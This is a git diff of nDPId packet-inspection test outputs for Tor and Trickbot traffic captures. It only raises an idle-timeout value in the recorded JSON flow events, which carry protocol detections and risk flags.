+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822190886,"flow_last_seen":1383822190886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822190886,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2072,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1383822190886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190886,"pkt":"UlQA2EYhUlQAWul3CABFAAA0COtAAIAGZnzAqAH8PtKJ5sfxAbspsDzeAAAAAIACIACTeAAAAgQFtAEDAwgBAQQC"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1383822190950,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822190950,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGvmc+0onmwKgB\/AG7x\/Gvhi1nKbA834ASOQidcgAAAgQFtAEBBAIBAwMH"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1383822190951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822190951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCOxAAIAGZofAqAH8PtKJ5sfxAbspsDzfr4YtaFAQAQAWTQAAAAAAAAAA"} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2075,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822190886,"flow_last_seen":1383822190951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1383822190951,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01159{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2077,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822190886,"flow_last_seen":1383822191037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":958,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1383822191037,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.6gyip7tqim7sieb.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.a3uycdf3rn5md.com","subjectDN":"CN=www.l7xvysfnvkb.net","fingerprint":"EE:86:E7:21:36:93:23:30:DB:A0:09:48:55:16:CB:A8:E9:DA:01:D0"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822192212} 
00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":2097,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822192034,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2107,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822194212} 
@@ -347,12 +347,12 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822276211} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -01050{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 
+01050{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1383822190886,"flow_last_seen":1383822265123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"62.210.137.230","src_port":51185,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1383822129889,"flow_last_seen":1383822265160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8625,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1826,"flow_first_seen":1383822130889,"flow_last_seen":1383822265215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1411596,"flow_avg_l4_payload_len":773,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","packets-captured":3859,"packets-processed":3694,"total-skipped-flows":0,"total-l4-data-len":2811958,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":10,"total-detection-updates":7,"total-updates":1,"current-active-flows":0,"total-active-flows":11,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":356,"global_ts_msec":1383822276211} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3859/3694 diff --git a/test/results/trickbot.pcap.out b/test/results/trickbot.pcap.out index 321f4f7c2..e075fb50c 100644 --- a/test/results/trickbot.pcap.out +++ b/test/results/trickbot.pcap.out 
@@ -1,12 +1,12 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"trickbot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1609266107551} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609266107551,"flow_last_seen":1609266107551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609266107551,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609266107551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1609266107551,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0c9FAAIAGK0cKDB1lUnbhxO+GG6gSdtdWAAAAAIAC\/\/8eaQAAAgQFtAEDAwgBAQQC"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1609266107797,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsYEQAAIAGftxSduHECgwdZRuo74Zi7VJcEnbXV2AS+vCXMwAAAgQFtA=="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609266107797,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoc9JAAIAGK1IKDB1lUnbhxO+GG6gSdtdXYu1SXVAQ\/\/+p4QAA"} -01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol 
on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} -01248{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} 
-01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1609266107551,"flow_last_seen":1609266107551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1609266107551,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609266107551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1609266107551,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0c9FAAIAGK0cKDB1lUnbhxO+GG6gSdtdWAAAAAIAC\/\/8eaQAAAgQFtAEDAwgBAQQC"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609266107797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1609266107797,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsYEQAAIAGftxSduHECgwdZRuo74Zi7VJcEnbXV2AS+vCXMwAAAgQFtA=="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609266107797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609266107797,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoc9JAAIAGK1IKDB1lUnbhxO+GG6gSdtdXYu1SXVAQ\/\/+p4QAA"} +01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609266107551,"flow_last_seen":1609266107797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1609266107797,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol 
on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} +01248{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1609266107551,"flow_last_seen":1609266108728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1358,"flow_tot_l4_payload_len":2635,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1609266108728,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"82.118.225.196","url":"82.118.225.196:7080\/OK21pqJAtyyGBEo00sk","code":200,"content_type":"text\/html","user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident\/7.0; .NET4.0C; .NET4.0E)"}} 
+01046{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":74,"flow_first_seen":1609266107551,"flow_last_seen":1609266115947,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":57990,"flow_avg_l4_payload_len":783,"midstream":0,"thread_ts_msec":1609266115947,"l3_proto":"ip4","src_ip":"10.12.29.101","dst_ip":"82.118.225.196","src_port":61318,"dst_port":7080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":74,"source":"trickbot.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":74,"total-skipped-flows":0,"total-l4-data-len":57990,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1609266115947} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 74/74 diff --git a/test/results/tumblr.pcap.out b/test/results/tumblr.pcap.out index d8c9403c8..17264be4f 100644 --- a/test/results/tumblr.pcap.out +++ 